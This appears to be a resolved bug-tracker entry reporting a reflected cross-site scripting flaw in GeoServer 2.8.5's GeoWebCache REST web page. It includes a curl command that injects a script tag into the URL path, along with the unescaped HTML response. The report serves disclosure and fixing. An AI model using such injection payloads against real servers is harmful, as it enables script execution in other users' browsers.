Details
-
Type:
Bug
-
Status: Resolved
-
Priority:
Medium
-
Resolution: Fixed
-
Affects Version/s: 2.8.5
-
Fix Version/s: 2.12-RC1
-
Component/s: Vulnerability
-
Environment:
Tomcat 7, OpenJDK 1.8.0_102
Description
Running
curl 'http://localhost:8080/geoserver/gwc/rest/web/"><script>alert(1)</script>'
yields an answer with unescaped HTML:
<html><body> <a id="logo" href="http://localhost:8080/geoserver/gwc/rest/web/"><script>alert(1)</"><img src="http://localhost:8080/geoserver/gwc/rest/web/"><script>alert(1)</script>/web/geowebcache_logo.png" alt="" height="100" width="353" border="0"/></a> <h3>Resources available from here:</h3><ul><li><h4><a href="http://localhost:8080/geoserver/gwc/rest/web/"><script>alert(1)</script>/layers/">layers</a></h4>Lets you see the configured layers. You can also view a specific layer by appending the name of the layer to the URL, DELETE an existing layer or POST a new one. Note that the latter operations only make sense when GeoWebCache has been configured through geowebcache.xml. You can POST either XML or JSON.</li> <li><h4>seed</h4></li> </ul></body></html>
Looks like the problem is similar to
GEOS-7549
Closed
.